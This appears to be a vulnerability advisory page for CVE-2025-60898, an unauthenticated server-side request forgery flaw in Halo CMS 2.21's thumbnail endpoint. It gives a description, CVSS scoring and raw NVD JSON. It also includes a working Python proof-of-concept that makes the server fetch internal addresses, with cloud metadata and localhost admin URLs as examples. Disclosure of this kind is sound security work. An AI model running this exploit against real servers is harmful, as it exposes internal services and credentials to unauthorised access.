Security Vulnerability Report
中文
CVE-2025-60898 CVSS 5.8 MEDIUM

CVE-2025-60898

Published: 2025-10-29 16:15:34
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

An unauthenticated server-side request forgery (SSRF) vulnerability in the Thumbnail via-uri endpoint of Halo CMS 2.21 allows a remote attacker to cause the server to issue HTTP requests to attacker-controlled URLs, including internal addresses. The endpoint performs a server-side GET to a user-supplied URI without adequate allow/blocklist validation and returns a 307 redirect that can disclose internal URLs in the Location header.

CVSS Details

CVSS Score
5.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Halo CMS 2.21

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys def exploit_ssrf(target_url, internal_target): """ CVE-2025-60898 PoC - Halo CMS 2.21 SSRF via Thumbnail via-uri endpoint Args: target_url: Target Halo CMS server URL internal_target: Internal URL to probe (e.g., http://169.254.169.254/latest/meta-data/) Returns: Response from the SSRF request """ # Construct the vulnerable endpoint endpoint = f"{target_url.rstrip('/')}/api/thumbnails/thumbnail" # Payload with via-uri parameter pointing to internal resource params = { 'uri': internal_target } print(f"[*] Targeting: {endpoint}") print(f"[*] Probing internal resource: {internal_target}") try: # Send request without authentication response = requests.get(endpoint, params=params, timeout=10, allow_redirects=False) print(f"[+] Status Code: {response.status_code}") print(f"[+] Response Headers: {dict(response.headers)}") if response.status_code == 307: print(f"[!] SSRF Confirmed - Location Header: {response.headers.get('Location', 'N/A')}") return response except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None if __name__ == "__main__": if len(sys.argv) < 3: print(f"Usage: python {sys.argv[0]} <target_url> <internal_url>") print(f"Example: python {sys.argv[0]} http://target.com http://127.0.0.1:8080/admin") sys.exit(1) target = sys.argv[1] internal = sys.argv[2] exploit_ssrf(target, internal)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60898", "sourceIdentifier": "[email protected]", "published": "2025-10-29T16:15:34.197", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An unauthenticated server-side request forgery (SSRF) vulnerability in the Thumbnail via-uri endpoint of Halo CMS 2.21 allows a remote attacker to cause the server to issue HTTP requests to attacker-controlled URLs, including internal addresses. The endpoint performs a server-side GET to a user-supplied URI without adequate allow/blocklist validation and returns a 307 redirect that can disclose internal URLs in the Location header."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "http://halo.com", "source": "[email protected]"}, {"url": "https://github.com/abdulr7mann/CVEs/blob/main/CVE-2025-60898/CVE-2025-60898.md", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.